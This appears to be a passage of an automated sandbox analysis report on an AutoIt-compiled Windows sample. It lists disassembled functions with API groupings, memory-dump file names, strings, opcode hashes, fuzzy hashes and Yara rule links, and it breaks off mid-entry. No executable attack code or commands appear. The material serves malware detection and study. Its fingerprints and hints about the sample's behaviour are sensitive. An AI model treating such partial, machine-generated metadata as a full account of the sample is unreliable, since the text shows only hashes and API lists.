                                                                                Function 00007FF79F873EB4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath
                                                                                • String ID:
                                                                                • API String ID: 82841172-0
                                                                                • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                • Instruction ID: 47dce671b1f9b97d0abbb67f3215618cc415474dc8f895365eb2be1559dbf058
                                                                                • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                • Instruction Fuzzy Hash: 45E09222B0868181D761A725E5447E8A3A1BB8C7C4F444031EE8C4775ACD6CC5958A10
                                                                                Function 00007FF79F875D88 Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_
                                                                                • String ID:
                                                                                • API String ID: 1144537725-0
                                                                                • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                • Instruction ID: ff38ad0d46eb651fee450b768ba529e5c2bc4e68eb02c3ec050febd176685abf
                                                                                • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                • Instruction Fuzzy Hash: C2F05E61919BC187E3B1AB64E4447A5B7A4F784348FC40035D18D463A9CF3CD355CB10
                                                                                Function 00007FF79F871080 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Open_onexit
                                                                                • String ID:
                                                                                • API String ID: 3030063568-0
                                                                                • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                • Instruction ID: 5e3137c629a4ae87e90b521523e14820e5593e099046824abef18ac4b7af5ae4
                                                                                • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                • Instruction Fuzzy Hash: 62E0EC60F1A9CB80EA64B77A98C55F893906F95316FD09536C01D82366DE1CE2F59720
                                                                                Function 00007FF79F8710E8 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentVersionWow64_onexit
                                                                                • String ID:
                                                                                • API String ID: 2932345936-0
                                                                                • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                • Instruction ID: 3832c41224bd805185b983b9d281447c305e55557a43d0355958c64c35241feb
                                                                                • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                • Instruction Fuzzy Hash: 4EC01200F6D4CB80E66873B648968F842904FE5300FE00536C10D80282DD0C71FA2731
                                                                                Function 00007FF79F871048 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _onexit
                                                                                • String ID:
                                                                                • API String ID: 572287377-0
                                                                                • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                • Instruction ID: 0967709e7a1a7de06f92bebe6f1e2d094256d3ffef03817174caf3199c5d56c2
                                                                                • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                • Instruction Fuzzy Hash: B2C01200F590CB80E56873B648968FC41D00FE9311FE04935C00D80282CD0C61FA6721
                                                                                Function 00007FF79F871064 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _onexit
                                                                                • String ID:
                                                                                • API String ID: 572287377-0
                                                                                • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                • Instruction ID: f599fab7238f71f3dd0eda2ccfe9aa4cebf387b32d6bd4e0c8eb19a1ef22e1b6
                                                                                • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                • Instruction Fuzzy Hash: 57C01201F6E0CB80E56873B64C968FC41900FE9300FE00535D00D80282CD1C61F66631
                                                                                Function 00007FF79F8F7E48 Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                • Instruction ID: 77a1f782423c7f198ac81c6e57b415d2e5e8f7ac61081c5a0b7f75ed2ffc52fb
                                                                                • Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                • Instruction Fuzzy Hash: E4715B22B04A8285EBA0FF75D0917FDA360EB84B94F844532DE1D577A6CF38E465D360
                                                                                Function 00007FF79F8AC51C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 4292702814-0
                                                                                • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                • Instruction ID: 0589d5ce42b2baca7b4b50d2ca4b5f40602415246bc5336424dd1070c57fb7de
                                                                                • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                • Instruction Fuzzy Hash: 23F0F441B0A2C785FEB4B6715D15AF9D145AF45BB0FC84630EC2E893C5DE5CE4A0A530

                                                                                Non-executed Functions

                                                                                Function 00007FF79F9056A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                • Instruction ID: 94484dc3d84e9b21328cad5c16d7bed2c397f09474198750007fdbdd39be8fb2
                                                                                • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                • Instruction Fuzzy Hash: CF228336A08A8186E724EF35E8445ADB7B0FB88BA4F954135DE4E87B68DF3CD445CB10
                                                                                Function 00007FF79F9217C0 Relevance: 70.6, APIs: 38, Strings: 2, Instructions: 587windowkeyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                                                • String ID: @GUI_DRAGID$F
                                                                                • API String ID: 1993697042-4164748364
                                                                                • Opcode ID: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                                • Instruction ID: c48090bf5dd59e87e77250bd4eadadcb4b8274ab551c360f3511acb19eafbb95
                                                                                • Opcode Fuzzy Hash: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                                • Instruction Fuzzy Hash: 35527532A18A8281FB74AB35D8946FDA760FB84BA4F914135DB0D877A9CF3CE494C750
                                                                                Function 00007FF79F91CE8C Relevance: 69.5, APIs: 46, Instructions: 540windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                                                • String ID:
                                                                                • API String ID: 3481653762-0
                                                                                • Opcode ID: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                                • Instruction ID: f5925f36087bf0b855858b78ebafb7536b67f309d87e81a5126af308f7c590fa
                                                                                • Opcode Fuzzy Hash: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                                • Instruction Fuzzy Hash: 38327076B08AC18AE764EF35D8446F9A7A0FB85BA4F904136DA4E87B98CF3CD445C710
                                                                                Function 00007FF79F91BA0C Relevance: 54.8, APIs: 30, Strings: 1, Instructions: 500windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                                                • String ID: %d/%02d/%02d
                                                                                • API String ID: 1218376639-328681919
                                                                                • Opcode ID: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
                                                                                • Instruction ID: 82018e120e36bb82fc1039818ac5348901d71279fc6a4ce9a1ac1392123e8955
                                                                                • Opcode Fuzzy Hash: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
                                                                                • Instruction Fuzzy Hash: 2712C632B09A828AF770EF3598546FDA3A1EB85BA4F914135DE1A87BD8CF3CD4458710
                                                                                Function 00007FF79F91DB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                                • String ID: P
                                                                                • API String ID: 1208186926-3110715001
                                                                                • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                • Instruction ID: 52e804e3490fae90d37108de1f135522209873abebb9bfc2a8e4f6d74cf3e0e0
                                                                                • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                • Instruction Fuzzy Hash: 8312E072B18AC28AE734EB35D4547F9A7A0FB857A4F900536DA4987B98CF3CE445CB10
                                                                                Function 00007FF79F9032AC Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 327windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                • API String ID: 2910397461-2439800395
                                                                                • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                • Instruction ID: cfbcc2e062b061863b218c93680bfe0050d2d0d095602ddc0e92c0e77dace4aa
                                                                                • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                • Instruction Fuzzy Hash: AEE19376608AC187E764EF35E8406A9B7A0FB887A4F905135DA4E87B68CF7CE055CB10
                                                                                Function 00007FF79F87183C Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                • String ID:
                                                                                • API String ID: 3372153169-0
                                                                                • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                • Instruction ID: 17b62aa78e68a066c6d2a49b8018a4a6f0404768a6497d1c04e328eddb3e4d59
                                                                                • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                • Instruction Fuzzy Hash: 2D229221A08AC385EBB0AB35C454BFDA761EF44BA5F944131CA1E477A8DF3CE495E320
                                                                                Function 00007FF79F8DCE68 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                                • String ID: default$winsta0$winsta0\default
                                                                                • API String ID: 3202303201-1423368268
                                                                                • Opcode ID: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                                                • Instruction ID: ae1a540011651975d05c72a3a77625faa3b15144daa5081f7efc3f263b547f56
                                                                                • Opcode Fuzzy Hash: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                                                • Instruction Fuzzy Hash: B0A16232A08B8286EB60EF71E8446E9A3A5FF857A4F844136DE5D47B98CF3CE015D750
                                                                                Function 00007FF79F872AE0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI
                                                                                • API String ID: 1458621304-248962490
                                                                                • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                • Instruction ID: 536a734345e4e4c066d69633cbbf6afdbbd660394f838c9c08625b47c1fafd9b
                                                                                • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                • Instruction Fuzzy Hash: B6D14D32A04A828AE764EF79D8947ED77A1FB44768F900135DA0E87BA8DF3CE454C750
                                                                                Function 00007FF79F89F8D0 Relevance: 31.9, APIs: 20, Instructions: 1857COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
